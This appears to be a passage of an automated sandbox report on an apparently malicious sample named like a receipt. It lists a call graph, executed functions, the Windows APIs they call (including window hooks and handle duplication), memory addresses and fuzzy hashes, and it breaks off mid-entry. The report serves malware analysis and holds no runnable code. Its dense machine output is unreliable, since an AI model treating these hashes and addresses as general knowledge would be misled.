33407->33408 33410 64377b2 33408->33410 33410->33389 33193 15ad0fc 33194 15ad114 33193->33194 33195 15ad16e 33194->33195 33200 5637ea0 33194->33200 33204 5638c08 33194->33204 33213 56350f4 33194->33213 33222 5637eb0 33194->33222 33201 5637ed6 33200->33201 33202 56350f4 CallWindowProcW 33201->33202 33203 5637ef7 33202->33203 33203->33195 33205 5638c18 33204->33205 33206 5638c79 33205->33206 33208 5638c69 33205->33208 33209 5638c77 33206->33209 33242 563521c 33206->33242 33226 5638da0 33208->33226 33231 5638e6c 33208->33231 33237 5638d90 33208->33237 33214 56350ff 33213->33214 33215 5638c79 33214->33215 33217 5638c69 33214->33217 33216 563521c CallWindowProcW 33215->33216 33218 5638c77 33215->33218 33216->33218 33219 5638da0 CallWindowProcW 33217->33219 33220 5638d90 CallWindowProcW 33217->33220 33221 5638e6c CallWindowProcW 33217->33221 33219->33218 33220->33218 33221->33218 33223 5637ed6 33222->33223 33224 56350f4 CallWindowProcW 33223->33224 33225 5637ef7 33224->33225 33225->33195 33228 5638db4 33226->33228 33227 5638e40 33227->33209 33246 5638e4b 33228->33246 33249 5638e58 33228->33249 33232 5638e2a 33231->33232 33233 5638e7a 33231->33233 33235 5638e4b CallWindowProcW 33232->33235 33236 5638e58 CallWindowProcW 33232->33236 33234 5638e40 33234->33209 33235->33234 33236->33234 33239 5638da0 33237->33239 33238 5638e40 33238->33209 33240 5638e4b CallWindowProcW 33239->33240 33241 5638e58 CallWindowProcW 33239->33241 33240->33238 33241->33238 33243 5635227 33242->33243 33244 563a35a CallWindowProcW 33243->33244 33245 563a309 33243->33245 33244->33245 33245->33209 33247 5638e69 33246->33247 33252 563a291 33246->33252 33247->33227 33250 5638e69 33249->33250 33251 563a291 CallWindowProcW 33249->33251 33250->33227 33251->33250 33253 563521c CallWindowProcW 33252->33253 33254 563a2aa 33253->33254 33254->33247 33411 15ad01c 33412 15ad034 33411->33412 33413 15ad087 33412->33413 33416 563f9a8 33412->33416 33420 563f998 33412->33420 33417 563fafa 33416->33417 33418 563f9c1 33416->33418 33417->33413 33418->33417 33419 16326e9 2 API calls 33418->33419 33419->33417 33421 563f9c1 33420->33421 33422 563fafa 33420->33422 33421->33422 33423 16326e9 2 API calls 33421->33423 33422->33413 33423->33422 33446 563c989 33447 563c992 33446->33447 33448 563c9b3 33446->33448 33447->33448 33449 563bbd0 OleInitialize 33447->33449 33449->33448 33178 563c668 33179 563c970 33178->33179 33180 563c690 33178->33180 33181 563c699 33180->33181 33184 563bbb4 33180->33184 33183 563c6bc 33185 563bbbf 33184->33185 33187 563c9b3 33185->33187 33188 563bbd0 33185->33188 33187->33183 33189 563c9e8 OleInitialize 33188->33189 33190 563ca4c 33189->33190 33190->33187 33255 1639f48 33256 1639f56 33255->33256 33259 16396c4 33256->33259 33258 1639f5f 33260 16396cf 33259->33260 33263 1639c68 33260->33263 33262 163a065 33262->33258 33264 1639c73 33263->33264 33267 1639cd0 33264->33267 33266 163a125 33266->33262 33268 1639cdb 33267->33268 33271 163a5a4 33268->33271 33270 163aa12 33270->33266 33272 163a5af 33271->33272 33275 163ae10 33272->33275 33274 163af24 33274->33270 33276 163ae1b 33275->33276 33278 163e353 33276->33278 33283 5631520 33276->33283 33287 5631530 33276->33287 33277 163e391 33277->33274 33278->33277 33291 5631370 33278->33291 33296 5631380 33278->33296 33284 563153c 33283->33284 33301 16326e9 33284->33301 33285 563157d 33285->33278 33288 563153c 33287->33288 33290 16326e9 2 API calls 33288->33290 33289 563157d 33289->33278 33290->33289 33292 56313a1 33291->33292 33293 56313c5 33292->33293 33330 56319e8 33292->33330 33334 5631a08 33292->33334 33293->33277 33298 56313a1 33296->33298 33297 56313c5 33297->33277 33298->33297 33299 56319e8 4 API calls 33298->33299 33300 5631a08 4 API calls 33298->33300 33299->33297 33300->33297 33302 1632709 33301->33302 33303 16327aa 33302->33303 33306 5636b08 33302->33306 33310 5636aed 33302->33310 33303->33285 33307 5636b21 33306->33307 33314 5636fb0 33307->33314 33308 5636b5d 33308->33303 33311 5636b21 33310->33311 33313 5636fb0 2 API calls 33311->33313 33312 5636b5d 33312->33303 33313->33312 33315 5636efe 33314->33315 33317 5636fb3 33314->33317 33315->33308 33316 563705b 33316->33308 33317->33316 33320 56373c0 33317->33320 33325 56373d0 33317->33325 33323 56373d0 33320->33323 33321 5637620 33321->33316 33322 5637cf3 CreateWindowExW 33324 5637d54 33322->33324 33323->33321 33323->33322 33324->33324 33328 56373e5 33325->33328 33326 5637620 33326->33316 33327 5637cf3 CreateWindowExW 33329 5637d54 33327->33329 33328->33326 33328->33327 33329->33329 33331 56319ed 33330->33331 33332 5631a4e 33331->33332 33338 56315f8 33331->33338 33332->33293 33335 5631a15 33334->33335 33336 5631a4e 33335->33336 33337 56315f8 4 API calls 33335->33337 33336->33293 33337->33336 33339 5631603 33338->33339 33341 5631ac0 33339->33341 33342 563162c 33339->33342 33341->33341 33343 5631637 33342->33343 33350 5631fd0 33343->33350 33354 5631fbf 33343->33354 33344 5631b3e 33348 56358c8 CreateWindowExW CreateWindowExW 33344->33348 33349 56358d8 CreateWindowExW CreateWindowExW 33344->33349 33345 5631b69 33345->33341 33348->33345 33349->33345 33351 5631ffe 33350->33351 33352 56320ca KiUserCallbackDispatcher 33351->33352 33353 56320cf 33351->33353 33352->33353 33355 5631ffe 33354->33355 33356 56320ca KiUserCallbackDispatcher 33355->33356 33357 56320cf 33355->33357 33356->33357 33358 5633e48 33359 5633e5c 33358->33359 33360 5633e6e 33359->33360 33361 5631520 2 API calls 33359->33361 33362 5631530 2 API calls 33359->33362 33361->33360 33362->33360 33363 1637ac8 33364 1637b0c SetWindowsHookExW 33363->33364 33366 1637b52 33364->33366 33424 163d738 33426 163d766 33424->33426 33428 163ced8 33426->33428 33427 163d786 33429 163cee3 33428->33429 33430 163e5bc 33429->33430 33431 163e617 33429->33431 33432 5631370 4 API calls 33429->33432 33433 5631380 4 API calls 33429->33433 33430->33431 33436 563d2c9 33430->33436 33441 563d2d8 33430->33441 33431->33427 33432->33430 33433->33430 33438 563d2ce 33436->33438 33437 563bc30 PeekMessageW 33437->33438 33438->33437 33439 563d38a 33438->33439 33440 563d7a0 WaitMessage 33438->33440 33439->33431 33440->33438 33444 563d33d 33441->33444 33442 563bc30 PeekMessageW 33442->33444 33443 563d7a0 WaitMessage 33443->33444 33444->33442 33444->33443 33445 563d38a 33444->33445 33445->33431

                Executed Functions

                Function 056373D0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 333COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1944 56373d0-56373f6 1947 5637426-563742e 1944->1947 1948 56373f8-5637420 call 56319ac call 563289c 1944->1948 1950 5637430-5637435 call 5635044 1947->1950 1951 5637474-56374ae call 5635050 1947->1951 1948->1947 1960 563762c-5637653 1948->1960 1956 563743a-563746f 1950->1956 1969 56374b4-56374ff 1951->1969 1970 563765a-563768c 1951->1970 1965 5637502-563755b call 56319ac call 563505c 1956->1965 1960->1970 1993 5637560-5637564 1965->1993 1969->1965 1985 5637693-5637c96 1970->1985 1999 5637ca1-5637ca8 1985->1999 2000 5637c98-5637c9e 1985->2000 1994 5637620-563762b 1993->1994 1995 563756a-5637577 1993->1995 2001 563757d-56375aa call 56319ac call 5635050 1995->2001 2002 563761c-563761e 1995->2002 2003 5637cb3-5637d52 CreateWindowExW 1999->2003 2004 5637caa-5637cb0 1999->2004 2000->1999 2001->2002 2019 56375ac-56375b9 2001->2019 2002->1985 2002->1994 2007 5637d54-5637d5a 2003->2007 2008 5637d5b-5637d93 2003->2008 2004->2003 2007->2008 2017 5637da0 2008->2017 2018 5637d95-5637d98 2008->2018 2021 5637da1 2017->2021 2018->2017 2019->2002 2020 56375bb-56375d2 call 56319ac call 5635068 2019->2020 2026 56375d4-56375dd call 563505c 2020->2026 2027 56375df-563760e call 563505c 2020->2027 2021->2021 2026->2002 2027->2002 2035 5637610-563761a 2027->2035 2035->2002 2035->2027
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: s.
                • API String ID: 0-1022735206
                • Opcode ID: a47e16a1e896e5cf401d199f5ea250442afb3d2788e41834feee0c80524387e8
                • Instruction ID: 8df094f8df6fd66167a6a09edd216424118a35c018804234aaf89fa022b76e4a
                • Opcode Fuzzy Hash: a47e16a1e896e5cf401d199f5ea250442afb3d2788e41834feee0c80524387e8
                • Instruction Fuzzy Hash: 32D14CB0E007059FCB14DF69D894AAEBBF6FF88310B108929D80A9B750DB74E945CF94
                Function 0563D2D8 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a113348c25436dfa524a3d46e78186077a3da5b98867142774dab2effc233444
                • Instruction ID: a1be28446ff7080168b018b0271cf281e86834886d3631226ea2e0ad9fb05ccf
                • Opcode Fuzzy Hash: a113348c25436dfa524a3d46e78186077a3da5b98867142774dab2effc233444
                • Instruction Fuzzy Hash: 92F14C30A00209CFDB14DFA9C985BADBBF2FF48344F158569E419AB3A5DB74E945CB80
                Function 0163AF90 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1074 163af90-163b02f GetCurrentProcess 1078 163b031-163b037 1074->1078 1079 163b038-163b06c GetCurrentThread 1074->1079 1078->1079 1080 163b075-163b0a9 GetCurrentProcess 1079->1080 1081 163b06e-163b074 1079->1081 1082 163b0b2-163b0cd call 163b4ff 1080->1082 1083 163b0ab-163b0b1 1080->1083 1081->1080 1087 163b0d3-163b102 GetCurrentThreadId 1082->1087 1083->1082 1088 163b104-163b10a 1087->1088 1089 163b10b-163b16d 1087->1089 1088->1089
                APIs
                • GetCurrentProcess.KERNEL32 ref: 0163B01E
                • GetCurrentThread.KERNEL32 ref: 0163B05B
                • GetCurrentProcess.KERNEL32 ref: 0163B098
                • GetCurrentThreadId.KERNEL32 ref: 0163B0F1
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: e3fb1ff6579f97debe293116fd042778947420a11e748a3d94f5c15fddaf441b
                • Instruction ID: edb84f1b10dd48f7b748aa7409a3d8b1d903bef64234f260af3597448de8bdb6
                • Opcode Fuzzy Hash: e3fb1ff6579f97debe293116fd042778947420a11e748a3d94f5c15fddaf441b
                • Instruction Fuzzy Hash: 3C5156B09003098FDB14DFA9D948BAEBFF5FF88314F208419E519A7360DB746988CB65
                Function 0163AFA0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1096 163afa0-163b02f GetCurrentProcess 1100 163b031-163b037 1096->1100 1101 163b038-163b06c GetCurrentThread 1096->1101 1100->1101 1102 163b075-163b0a9 GetCurrentProcess 1101->1102 1103 163b06e-163b074 1101->1103 1104 163b0b2-163b0cd call 163b4ff 1102->1104 1105 163b0ab-163b0b1 1102->1105 1103->1102 1109 163b0d3-163b102 GetCurrentThreadId 1104->1109 1105->1104 1110 163b104-163b10a 1109->1110 1111 163b10b-163b16d 1109->1111 1110->1111
                APIs
                • GetCurrentProcess.KERNEL32 ref: 0163B01E
                • GetCurrentThread.KERNEL32 ref: 0163B05B
                • GetCurrentProcess.KERNEL32 ref: 0163B098
                • GetCurrentThreadId.KERNEL32 ref: 0163B0F1
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: f63c91a39db063b5dfad49588973f032085a7d690068731115fd26fb4e048674
                • Instruction ID: d567acea9ee3e52b0732174d6281b951a2d2301e146f332a4a327bfe458e10c4
                • Opcode Fuzzy Hash: f63c91a39db063b5dfad49588973f032085a7d690068731115fd26fb4e048674
                • Instruction Fuzzy Hash: 0F5157B09003498FDB14DFA9D548BAEBFF5FF88304F208459E519A7360DB356988CB65
                Function 05637C24 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,00000000,?), ref: 05637D42
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: baea1cd8cdc4148b809b15339d7d2c44f9c08991ddf68548db7b40e3567a062c
                • Instruction ID: 5bb8bd29dd5110f9d8792dbf7fcf850dc50712a6600f6c5eadb3500f5a55710a
                • Opcode Fuzzy Hash: baea1cd8cdc4148b809b15339d7d2c44f9c08991ddf68548db7b40e3567a062c
                • Instruction Fuzzy Hash: AB51C0B1D103099FDB14CFA9C984ADEBFB5FF48310F24812AE819AB210D774A945CF90
                Function 05637C30 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,00000000,?), ref: 05637D42
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: fd84e8f0abdf427633e42864d33020a76492a641398a79a1ccef7232e9531ead
                • Instruction ID: 6235f256b1a7c15c6228e4b0c5f5995044d6ab3d784d6c3958ff86e767274306
                • Opcode Fuzzy Hash: fd84e8f0abdf427633e42864d33020a76492a641398a79a1ccef7232e9531ead
                • Instruction Fuzzy Hash: BC41B0B1D003099FDB14CFA9C884ADEBBB5FF48310F24812AE819AB210D775A985CF90
                Function 0563521C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                Download Yara Rule
                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0563A381
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: 954e642e1edf23910f03c34762bd7333aae731bf3e92184a7981855fb0c7594a
                • Instruction ID: 6852eb2c7bc828757aa3031ad226e7b7b04a4d1265dc4ea11ba255636865afd9
                • Opcode Fuzzy Hash: 954e642e1edf23910f03c34762bd7333aae731bf3e92184a7981855fb0c7594a
                • Instruction Fuzzy Hash: A34138B4900309CFDB14CF99C489AAABBF5FF88314F24C459E559AB721D735A845CBA0
                Function 0163B5E8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163B677
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 8bffa1b5dad2b8dd41c609475550137676ee17dfee24c5cbbd4985b90802bad6
                • Instruction ID: 0e4d758c53d14c051578477b4ef3a814e2970274af344c4f6d0c92a0605b5a1f
                • Opcode Fuzzy Hash: 8bffa1b5dad2b8dd41c609475550137676ee17dfee24c5cbbd4985b90802bad6
                • Instruction Fuzzy Hash: 5B21D2B59002089FDB10CF9AD984ADEBFF4FB48320F14841AE918A3251D378A944CFA0
                Function 0163B5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163B677
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: d3ccd07bc71b325cb33831cf077a682b6166d7c144fca6af92408054a5293a58
                • Instruction ID: 5075f6386e41940791ef7b8c52c61eaf4fbcbfdb336166862a4cf23f8bc368f0
                • Opcode Fuzzy Hash: d3ccd07bc71b325cb33831cf077a682b6166d7c144fca6af92408054a5293a58
                • Instruction Fuzzy Hash: 7C21C4B59002589FDB10CF9AD984ADEBFF9FB49310F14841AE918A3351D378A944CFA5
                Function 01637AC0 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                Download Yara Rule
                APIs
                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01637B43
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: HookWindows
                • String ID:
                • API String ID: 2559412058-0
                • Opcode ID: 9779200b2d6a00cc9a1c0c95f550866b891202dd86e9b11ebaf6d481d95ccc15
                • Instruction ID: b4c8c52fc7d1ca5b0e126e2cd84fe9bdd0274c4d68de7c6041e924d3126143fb
                • Opcode Fuzzy Hash: 9779200b2d6a00cc9a1c0c95f550866b891202dd86e9b11ebaf6d481d95ccc15
                • Instruction Fuzzy Hash: AE2115B59002098FDB14DFA9D844BEEFBF5FF88310F10842AE559A7250CB78A945CFA1
                Function 01637AC8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                Download Yara Rule
                APIs
                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01637B43
                Memory Dump Source
                • Source File: 00000009.00000002.4558217312.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_1630000_Recaipt202431029.jbxd
                Similarity
                • API ID: HookWindows
                • String ID:
                • API String ID: 2559412058-0
                • Opcode ID: a2ca100afd7b8e069d563edec856a589d7a1ca031bc1e9725bc330ff5474a68e
                • Instruction ID: 680a25f7b7b433c8d17c01a608399c52fd2377a28f76d53118add588bdda9d08
                • Opcode Fuzzy Hash: a2ca100afd7b8e069d563edec856a589d7a1ca031bc1e9725bc330ff5474a68e
                • Instruction Fuzzy Hash: 2B2115B59002098FDB14DFAAC844BEEFBF5FF88310F10842AE519A7250CB74A945CFA1
                Function 0563273A Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 056327B6
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: f4eb1b4e301d0ece5b12a6171996bd69f6b7dc669fce754278618969be9edaf4
                • Instruction ID: a50a52cc16d5b272b10262ffb6b635ea46689ffc662d604d0c9e1e577f947d2d
                • Opcode Fuzzy Hash: f4eb1b4e301d0ece5b12a6171996bd69f6b7dc669fce754278618969be9edaf4
                • Instruction Fuzzy Hash: AA111FBAC043498FCB20CFAAC444A9EBBF5AF89310F14846AD419B7610C338A545CFA1
                Function 0563BC30 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                Download Yara Rule
                APIs
                • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0563D4BA,00000000,00000000,0415DAF8,030C76C4), ref: 0563D908
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: MessagePeek
                • String ID:
                • API String ID: 2222842502-0
                • Opcode ID: 753cf6c32cd7e39ff441345ce450633b13720db57e4871e813057aaa68e69cc1
                • Instruction ID: 68a4b0af9de8ce86e5c6d37025f498e6c2793e3e0e8873755272e903a3e15171
                • Opcode Fuzzy Hash: 753cf6c32cd7e39ff441345ce450633b13720db57e4871e813057aaa68e69cc1
                • Instruction Fuzzy Hash: DA1114B18002099FCB10DF9AD485BEEBBF8FB08310F10842AE959A3251D378A944CFA5
                Function 064368A0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                Download Yara Rule
                APIs
                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,064377B2), ref: 0643789F
                Memory Dump Source
                • Source File: 00000009.00000002.4568245356.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_6430000_Recaipt202431029.jbxd
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID:
                • API String ID: 1890195054-0
                • Opcode ID: 893fd9f4ec3f8e48dc381204178b40544a9b36697dd0b60d556b461a1d9d4a70
                • Instruction ID: a3f68d5f3ebc5caea984e0a9181f53c960ce7e10aa45425c1acb1a268a8ccc6f
                • Opcode Fuzzy Hash: 893fd9f4ec3f8e48dc381204178b40544a9b36697dd0b60d556b461a1d9d4a70
                • Instruction Fuzzy Hash: 191103B1C006599BDB10DF9AC4446AEFBF4EF48320F14816AE918A7240D778A944CFE5
                Function 0563D898 Relevance: 1.6, APIs: 1, Instructions: 54windowCOMMON
                Download Yara Rule
                APIs
                • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0563D4BA,00000000,00000000,0415DAF8,030C76C4), ref: 0563D908
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: MessagePeek
                • String ID:
                • API String ID: 2222842502-0
                • Opcode ID: 1b42ab7361657718dd70ca8616a9cae226a9a815ffb7fcec0193efd867f97695
                • Instruction ID: 5258ac1402dc6ba319f87f4b18a73a1c78c29f82e8e105f915bb8f626e90a560
                • Opcode Fuzzy Hash: 1b42ab7361657718dd70ca8616a9cae226a9a815ffb7fcec0193efd867f97695
                • Instruction Fuzzy Hash: 6F1126B5C00249DFDB10CF9AD984BDEBBF5FB08360F10842AE559A3250D378A645CFA1
                Function 05632750 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 056327B6
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 38ba04180db332cc998a362eedc6446f23d3b3dc70447028461156694a2e9b24
                • Instruction ID: c1f69ab223cdd0efc4681e8a109aff1789363228c5ef4c6cbbfdd7c13760a9ba
                • Opcode Fuzzy Hash: 38ba04180db332cc998a362eedc6446f23d3b3dc70447028461156694a2e9b24
                • Instruction Fuzzy Hash: 1211DFB9C003498FDB20DF9AD444A9EFBF8FB89724F10842AD919A7610D379A545CFA1
                Function 0563C9E0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                Download Yara Rule
                APIs
                • OleInitialize.OLE32(00000000), ref: 0563CA3D
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: Initialize
                • String ID:
                • API String ID: 2538663250-0
                • Opcode ID: ed01cc4f8ed7c23cfd4ed2eae962b3dd15189286eed95d182d72aa68ba841182
                • Instruction ID: d494169d4d5dfdb4214a0ad902afcf05c14f4527ea68fd0a21e0cef6af9e7f7f
                • Opcode Fuzzy Hash: ed01cc4f8ed7c23cfd4ed2eae962b3dd15189286eed95d182d72aa68ba841182
                • Instruction Fuzzy Hash: FE1103B58002488FDB20DF99D585B9EBBF4AF48314F24845AD559B3610D738A945CFA0
                Function 0563BBD0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                Download Yara Rule
                APIs
                • OleInitialize.OLE32(00000000), ref: 0563CA3D
                Memory Dump Source
                • Source File: 00000009.00000002.4564955880.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_5630000_Recaipt202431029.jbxd
                Similarity
                • API ID: Initialize
                • String ID:
                • API String ID: 2538663250-0
                • Opcode ID: 4256807ced2a2167c28f102886c5335db001f31ca90d96a11c8ffa3db6f554f5
                • Instruction ID: cc3b39406381b9441d723c7e8fbf29d083c7eff2ad6b6fe42bf1614b9860dd81
                • Opcode Fuzzy Hash: 4256807ced2a2167c28f102886c5335db001f31ca90d96a11c8ffa3db6f554f5
                • Instruction Fuzzy Hash: FE1103B18043488FDB20DF9AD449B9EBBF4EB48310F10845AE519B7240D778A944CFA5
                Function 012AD428 Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.4557646767.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_12ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82696445627247ed91e14a49a5d419b82745efebf0bd5ad0aa2dcc8cfab4c060
                • Instruction ID: 8df9846bc1db63f6b5c8a6d38972baa169f42948248e42aafad1c3e25cad5d93
                • Opcode Fuzzy Hash: 82696445627247ed91e14a49a5d419b82745efebf0bd5ad0aa2dcc8cfab4c060
                • Instruction Fuzzy Hash: 2A2142B1110208DFDB05CF98D9C0F66BF65FB98324F60C569EA090B656C33AE446CBA2
                Function 015AD0FC Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bb386f9ee2d115fb9808604767c1049816cb272df9d0de78511eb79ab2d96a6d
                • Instruction ID: 87774a0535062e2755fe5e1952f01874a8033bfdad0bbc3135160a8996b63813
                • Opcode Fuzzy Hash: bb386f9ee2d115fb9808604767c1049816cb272df9d0de78511eb79ab2d96a6d
                • Instruction Fuzzy Hash: 45210771584204DFDB05EF58D9C0B2ABFB5FB88314F60C96DD9094F656C33AE446CA61
                Function 015AD2B4 Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 093ab75eed86d2914a968159793f43111bb78c454355f4ae0e589a3e9d639165
                • Instruction ID: b58fd27fb232580f07166f0c5b94e4725d50e1858c4bde5aebadb08b45fc7f93
                • Opcode Fuzzy Hash: 093ab75eed86d2914a968159793f43111bb78c454355f4ae0e589a3e9d639165
                • Instruction Fuzzy Hash: 302125715842049FDB05EF58C5C0B2EBFB5FB84314F60C96ED9090F652C33AD406CA61
                Function 015AD01C Relevance: .1, Instructions: 71COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.4557949915.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_15ad000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
